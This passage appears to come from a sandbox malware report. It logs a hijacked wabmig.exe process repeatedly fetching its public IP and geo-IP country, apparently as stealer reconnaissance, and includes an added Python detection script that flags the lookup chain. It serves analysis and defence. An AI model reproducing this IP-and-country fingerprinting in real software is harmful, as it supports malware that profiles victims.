                                                            Sep 25, 2024 16:01:31.637789011 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:31 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: a873d5ab400faaeaf2ac363278533284
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.8 | 49718 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 25, 2024 16:01:32.265062094 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:32.957473040 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:32 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: c4204c702abfa5c6d17b17f593826339
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.8 | 49720 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 25, 2024 16:01:33.570441961 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:34.244263887 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:34 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: a764a474e7952ae8ca0e9ace70cbbe8f
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.8 | 49722 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 25, 2024 16:01:34.887885094 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:35.553495884 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:35 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 2ebb95560ef15a9869f1c53f93bc4107
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.8 | 49724 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 25, 2024 16:01:36.186857939 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:37.094461918 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:36 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 140234859258a3b0ca1add1a5d2819e0
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                            Sep 25, 2024 16:01:37.095856905 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:36 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 140234859258a3b0ca1add1a5d2819e0
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.8 | 49726 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 25, 2024 16:01:37.716640949 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:38.425971031 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:38 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: b3f6a0b356e436c17f38f2ccf498ab74
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.8 | 49728 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 25, 2024 16:01:39.236999989 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Sep 25, 2024 16:01:39.903758049 CEST | 320 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 103
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 2a60e6a89f4f2fd33a061d0423d79e01
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.8 | 49713 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:29 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:30 UTC | 684 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:29 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24948
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dz8K5Rytq1OICm4sSwoUt8KnrLoUiWG8ht%2B9wBtYgzN%2F2KQ%2F6CrkBK340KPm2CLzCubyX6xJjDIdcMD8NfgQWsrK%2BMsDspPzLcwIXLLk4hsF%2BAlh46nP0JQ%2Bj0VSD1hbpNAo6r%2FZ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8be9dceb8ca7-EWR
                                                            2024-09-25 14:01:30 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0
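The checkip.dyndns.org and reallyfreegeoip.org sessions above are the country-detection chain the report flags: wabmig.exe (PID 8168) fetches its public address and then requests /xml/ followed by that same address. The Python below is an added example, not code from the Joe Sandbox report or from the malware. It decodes the report's "Data Raw" hex and the chunked XML reply, and replays the chain over constructed session records to show how a detection ties the two lookups to one process. The host lists, the benign explorer.exe record and the tail of the XML body (the capture stops at <Latitude>37.75) are assumptions.

```python
"""Added example (not part of the Joe Sandbox report): reconstruct the
external-IP check and geo-IP lookup seen in the sessions above and flag the
chain. Sample messages are constructed to match the captured traffic; the
geo-IP XML is completed past the point where the capture truncates it."""
import re
import xml.etree.ElementTree as ET

# Hosts taken from the sessions above. A production rule would carry a
# longer list; only these two are supported by the report.
IP_CHECK_HOSTS = {"checkip.dyndns.org"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}

# User-Agent sent to checkip.dyndns.org in the sessions above; a useful
# proxy-log pivot because no modern browser sends it.
STEALER_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"

# Body returned by checkip.dyndns.org in the sessions above.
CHECKIP_BODY = (
    "<html><head><title>Current IP Check</title></head>"
    "<body>Current IP Address: 8.46.123.33</body></html>\r\n"
)
# Constructed: the capture ends at <Latitude>37.75, so the tail is assumed.
GEOIP_XML = (
    b"<Response>\n\t<IP>8.46.123.33</IP>\n\t<CountryCode>US</CountryCode>\n"
    b"\t<CountryName>United States</CountryName>\n\t<RegionCode></RegionCode>\n"
    b"\t<RegionName></RegionName>\n\t<City></City>\n\t<ZipCode></ZipCode>\n"
    b"\t<TimeZone>America/Chicago</TimeZone>\n\t<Latitude>37.75</Latitude>\n"
    b"</Response>\n"
)


def chunk(body: bytes) -> bytes:
    """Frame body as one HTTP/1.1 chunk plus the terminating zero chunk,
    the way reallyfreegeoip.org answered (Transfer-Encoding: chunked)."""
    return b"%x\r\n%s\r\n0\r\n\r\n" % (len(body), body)


def dechunk(data: bytes) -> bytes:
    """Decode HTTP/1.1 chunked transfer encoding into the raw body."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        if size == 0:
            return bytes(out)
        pos = eol + 2
        out += data[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF


def hexdump_to_bytes(raw: str) -> bytes:
    """Turn a 'Data Raw' hex line from the report into bytes."""
    return bytes.fromhex(raw)


def extract_public_ip(html: str):
    """Pull the WAN address out of the checkip.dyndns.org HTML body."""
    m = re.search(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})", html)
    return m.group(1) if m else None


def extract_geo(xml_body: bytes) -> dict:
    """Flatten the <Response> element into {tag: text}."""
    return {el.tag: (el.text or "") for el in ET.fromstring(xml_body)}


# Constructed session summaries mirroring the rows above:
# (pid, process, host, request line, body as the client received it)
WABMIG = r"C:\Program Files (x86)\Windows Mail\wabmig.exe"
SESSIONS = [
    (8168, WABMIG, "checkip.dyndns.org", "GET / HTTP/1.1", CHECKIP_BODY.encode()),
    (8168, WABMIG, "reallyfreegeoip.org", "GET /xml/8.46.123.33 HTTP/1.1", chunk(GEOIP_XML)),
    # Constructed benign noise: a different PID that only checks its IP.
    (4242, r"C:\Windows\explorer.exe", "checkip.dyndns.org", "GET / HTTP/1.1", CHECKIP_BODY.encode()),
]


def find_fingerprint_chain(sessions):
    """Return {(pid, process, country)} for processes that first learn their
    public IP from an IP-check host and then query a geo-IP host for that
    same address, the sequence the sandbox reports as country detection."""
    learned = {}      # pid -> public IP returned by the IP-check service
    flagged = set()
    for pid, proc, host, request_line, body in sessions:
        path = request_line.split()[1]
        if host in IP_CHECK_HOSTS:
            ip = extract_public_ip(body.decode(errors="replace"))
            if ip:
                learned[pid] = ip
        elif host in GEOIP_HOSTS and learned.get(pid) and learned[pid] in path:
            geo = extract_geo(dechunk(body))
            flagged.add((pid, proc, geo.get("CountryCode", "")))
    return flagged


if __name__ == "__main__":
    for hit in sorted(find_fingerprint_chain(SESSIONS)):
        print("fingerprint chain:", hit)
```

Two points the capture itself makes: the geo-IP request carries the victim's WAN address in the URL path, so a single proxy-log line for that request already discloses it; and every request in these sessions is attributed to wabmig.exe, a Windows Mail component that has no reason to query either service, so the process name is a stronger anomaly than the destinations, which legitimate software also uses.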


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:30 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-25 14:01:30 UTC | 686 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:30 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24949
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RYGPGBYdj%2F7lEE9yAllCgMmn3dR%2FWM0CM2pWiGLptbwU04Lp4CGNEdRscf%2FFEnR4F7m5eqa8kwHzG6HAyK8V1i%2BYKwCKLvVqpCdoqTkvtYHlfryWQ%2FdDMcrA%2Bz%2B4Mk4%2F4RQzb1K"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8bf01f188ce9-EWR
                                                            2024-09-25 14:01:30 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.8 | 49717 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:32 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:32 UTC | 710 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:32 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24951
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2F0Y87MBeglJkmfDqpFFTlWqd4or77Z7Ff3hjh%2F0%2FddrTRSad9Hyd0VtkscFxFBLFoQmjKkKwl7czM9C%2FB8ahKvFevPU5uYaIhIdPSwnobfLZ43pmSlO1AP10aYkT2L%2B6MHBTQke"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8bf82cf40fa1-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-09-25 14:01:32 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.8 | 49719 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:33 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:33 UTC | 674 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:33 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24952
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ftc2d1mpIlb4%2B2yKNwkveRaD3AIFObiMMw5DLKU30ePDlcbngTZkIkqiOfh601sL8Hb2olXbI0VRNz22xIBpxcD54wcZX9Y5K8aW9hV6yrGyrc83parl6Pmz%2FZvgMLry0L8CKuTI"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c006fff19e7-EWR
                                                            2024-09-25 14:01:33 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.8 | 49721 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:34 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-25 14:01:34 UTC | 684 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:34 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24953
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nt0Stbp647a9uOMr5a8Rt0f6Dll%2FYAYK2ZTSDhWIxqQIW4GOOKy9fSHwjGy5I4xIrXuCowbBkHBjeCbdD0UCZFXVzO%2FaFAOKLpjAJtulDZKR24%2FbPGl6gpQ%2Bs%2F8%2Fm%2Bl9AWaNpxBv"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c08794741e6-EWR
